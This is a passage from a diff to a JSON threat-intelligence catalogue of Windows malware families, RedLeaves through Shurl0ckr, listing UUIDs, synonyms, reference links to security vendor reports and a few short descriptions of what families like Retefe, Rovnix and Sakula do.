"https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", + "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" + ] + }, + "uuid": "a70e93a7-3578-47e1-9926-0818979ed866", + "value": "RedLeaves", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert", + "https://twitter.com/JaromirHorejsi/status/816237293073797121" + ] + }, + "uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618", + "value": "Red Alert", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler", + "http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf" + ] + }, + "uuid": "ca8ed7c0-f40b-4c0e-9dc4-52d6e0da41a7", + "value": "Red Gambler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg", + "https://sensepost.com/discover/tools/reGeorg/", + "https://github.com/sensepost/reGeorg" + ] + }, + "uuid": "9ee0eb87-7648-4581-b301-7472a48946ad", + "value": "reGeorg", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin", + "https://www.youtube.com/watch?v=jeLd-gw2bWo" + ] + }, + "uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb", + "value": "Regin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", + "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "http://malware-traffic-analysis.net/2017/12/22/index.html", + "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", + "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", + "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", + "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", + "https://secrary.com/ReversingMalware/RemcosRAT/" + ] + }, + "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2", + "value": "Remcos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", + "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions" + ] + }, + "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada", + "value": "Remexi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" + ] + }, + "uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9", + "value": "Remsec", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy" + ] + }, + "uuid": "b2b93651-cf64-47f5-a54f-799b919c592c", + "value": "Remy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom", + "https://www.coresecurity.com/sites/default/files/resources/2017/03/Behind_Malware_Infection_Chain.pdf" + ] + }, + "uuid": "a1f137d4-298f-4761-935d-bd39ab898479", + "value": "Rerdom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup", + "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/" + ] + }, + "uuid": "42fa55e3-e708-4c11-b807-f31573639941", + "value": "Retadup", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Tsukuba", + "Werdlod" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe", + "https://www.govcert.admin.ch/blog/33/the-retefe-saga", + "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/", + "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", + "https://github.com/cocaman/retefe" + ] + }, + "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", + "value": "Retefe", + "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic." + }, + { + "meta": { + "synonyms": [ + "Revetrat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat", + "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/", + "https://isc.sans.edu/diary/rss/22590", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f", + "value": "Revenge RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + ] + }, + "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", + "value": "RGDoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu", + "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" + ] + }, + "uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043", + "value": "Rikamanu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux" + ] + }, + "uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a", + "value": "Rincux", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm", + "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/" + ] + }, + "uuid": "a85b0619-ed8e-4324-8603-af211d682dac", + "value": "Ripper ATM", + "description": "" + }, + { + "meta": { + "synonyms": [ + "yellowalbatross" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock", + "https://github.com/securitykitten/malware_references/blob/master/rmshixdAPT-C-15-20160630.pdf" + ] + }, + "uuid": "95a26977-295f-4843-ad11-a3d9dcb6c192", + "value": "rock", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader", + "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware" + ] + }, + "uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e", + "value": "Rockloader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin" + ] + }, + "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf", + "value": "Rofin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku" + ] + }, + "uuid": "38f57823-ccc2-424b-8140-8ba30325af9c", + "value": "Rokku", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat", + "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", + "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", + "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/", + "https://www.youtube.com/watch?v=uoBQE5s2ba4" + ] + }, + "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5", + "value": "RokRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CarbonGrabber" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik", + "http://blogs.cisco.com/security/talos/rombertik" + ] + }, + "uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1", + "value": "Rombertik", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos" + ] + }, + "uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a", + "value": "Romeo(Alfa,Bravo, ...)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs" + ] + }, + "uuid": "b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9", + "value": "Roopirs", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam", + "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" + ] + }, + "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b", + "value": "Roseam", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover", + "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" + ] + }, + "uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050", + "value": "Rover", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Mayachok", + "Cidox", + "BkLoader" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix", + "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981", + "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0", + "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", + "https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/", + "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", + "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", + "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html" + ] + }, + "uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f", + "value": "Rovnix", + "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least)." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" + ] + }, + "uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72", + "value": "RoyalCli", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" + ] + }, + "uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a", + "value": "Royal DNS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena", + "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena" + ] + }, + "uuid": "cf74b7a5-72c0-4c2a-96c1-b3c49fc8f766", + "value": "Rozena", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", + "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" + ] + }, + "uuid": "e6952b4d-e96d-4641-a88f-60074776d553", + "value": "RTM", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos", + "https://boozallenmts.com/resources/news/rtpos-new-point-sale-malware-family-uncovered" + ] + }, + "uuid": "89ee2cb0-2c72-4a25-825b-bb56083fdd9b", + "value": "rtpos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv", + "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear" + ] + }, + "uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2", + "value": "Ruckguv", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish" + ] + }, + "uuid": "e1564cfe-ab82-4c14-8f92-65af0d760d70", + "value": "Rumish", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat", + "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" + ] + }, + "uuid": "b746a645-5974-44db-a811-a024214b7fba", + "value": "running_rat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "RCSU" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar", + "https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction" + ] + }, + "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", + "value": "Rurktar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock", + "https://www.secureworks.com/blog/research-21041", + "http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html", + "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", + "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", + "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/", + "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", + "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf", + "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/" + ] + }, + "uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d", + "value": "Rustock", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Saga" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom", + "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", + "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", + "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/", + "http://malware-traffic-analysis.net/2017/10/13/index.html" + ] + }, + "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431", + "value": "SAGE", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Sakurel" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", + "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", + "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", + "https://www.secureworks.com/research/sakula-malware-family" + ] + }, + "uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b", + "value": "Sakula RAT", + "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea", + "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf" + ] + }, + "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e", + "value": "Salgorea", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf" + ] + }, + "uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a", + "value": "Sality", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", + "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", + "http://blog.talosintel.com/2016/03/samsam-ransomware.html", + "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html", + "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/" + ] + }, + "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a", + "value": "SamSam", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Daws" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny", + "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" + ] + }, + "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", + "value": "Sanny", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Hussarini" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a", + "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html" + ] + }, + "uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e", + "value": "Sarhust", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", + "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", + "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", + "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" + ] + }, + "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", + "value": "Satan Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", + "https://www.cylance.com/threat-spotlight-satan-raas" + ] + }, + "uuid": "09b555be-8bac-44b2-8741-922ee0b87880", + "value": "Satana", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot", + "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" + ] + }, + "uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369", + "value": "Sathurbot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", + "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", + "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos" + ] + }, + "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf", + "value": "ScanPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken", + "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb", + "https://github.com/vithakur/schneiken" + ] + }, + "uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d", + "value": "Schneiken", + "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.scote", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/" + ] + }, + "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e", + "value": "Scote", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker", + "https://twitter.com/struppigel/status/791535679905927168" + ] + }, + "uuid": "9803b201-28e5-40c5-b661-c1a191388072", + "value": "ScreenLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + ] + }, + "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207", + "value": "SeaDaddy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c", + "value": "SeaSalt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "272268bb-2715-476b-a121-49142581c559", + "value": "SeDll", + "description": "" + }, + { + "meta": { + "synonyms": [ + "azzy", + "eviltoss" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf" + ] + }, + "uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75", + "value": "Sedreco", + "description": "" + }, + { + "meta": { + "synonyms": [ + "jhuhugit", + "jkeyskw", + "downrage", + "carberplike" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", + "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/", + "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", + "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", + "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", + "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", + "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed", + "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", + "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" + ] + }, + "uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c", + "value": "Seduploader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe" + ] + }, + "uuid": "503ca41c-7788-477c-869b-ac530f20c490", + "value": "SendSafe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico" + ] + }, + "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", + "value": "Serpico", + "description": "" + }, + { + "meta": { + "synonyms": [ + "XShellGhost" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", + "https://securelist.com/shadowpad-in-corporate-networks/81432/", + "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", + "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070" + ] + }, + "uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7", + "value": "ShadowPad", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti", + "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", + "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" + ] + }, + "uuid": "f64683c8-50ab-42c0-8b90-881598906528", + "value": "Shakti", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + ] + }, + "uuid": "15dd8386-f11a-485a-b719-440c0a47dee6", + "value": "SHAPESHIFT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "remotecmd" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip", + "https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" + ] + }, + "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", + "value": "shareip", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bitrep" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf", + "https://eromang.zataz.com/tag/agentbase-exe/" + ] + }, + "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43", + "value": "SHARPKNOT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker", + "https://twitter.com/JaromirHorejsi/status/813726714228604928" + ] + }, + "uuid": "af35e295-7087-4f6c-9f70-a431bf223822", + "value": "ShellLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" + ] + }, + "uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3", + "value": "Shifu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", + "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" + ] + }, + "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", + "value": "Shim RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin", + "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/", + "http://www.nyxbone.com/malware/chineseRansom.html" + ] + }, + "uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6", + "value": "Shujin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr", + 